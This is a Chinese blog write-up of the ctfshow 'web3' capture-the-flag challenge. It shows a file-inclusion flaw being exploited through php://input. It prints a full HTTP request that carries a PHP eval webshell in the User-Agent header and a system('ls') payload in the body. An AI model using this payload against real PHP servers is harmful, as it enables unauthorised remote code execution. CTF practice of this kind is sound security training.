ctfshow-web3

37 篇文章 0 订阅
文章讲述了如何利用PHP的php://input流来访问请求的原始数据,并将其作为PHP代码执行,从而触发文件包含漏洞。通过构造特定的GET请求,可以执行系统命令,例如运行ls来列出目录。作者发现了名为ctf_go_go_go的文件,并通过这种方式进行读取。
摘要由CSDN通过智能技术生成

0x00 前言

0x01 题目

在这里插入图片描述

0x02 Write Up

这个题目一看就知道是一个文件包含漏洞

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。

GET http://3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show/?url=php://input HTTP/1.1
Host: 3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: <?php @eval($_POST["s"])?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 20

<?php system('ls')?>

所以就可以直接执行命令

在这里插入图片描述
发现一个ctf_go_go_go的文件,然后读取就是了

在这里插入图片描述

以上

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值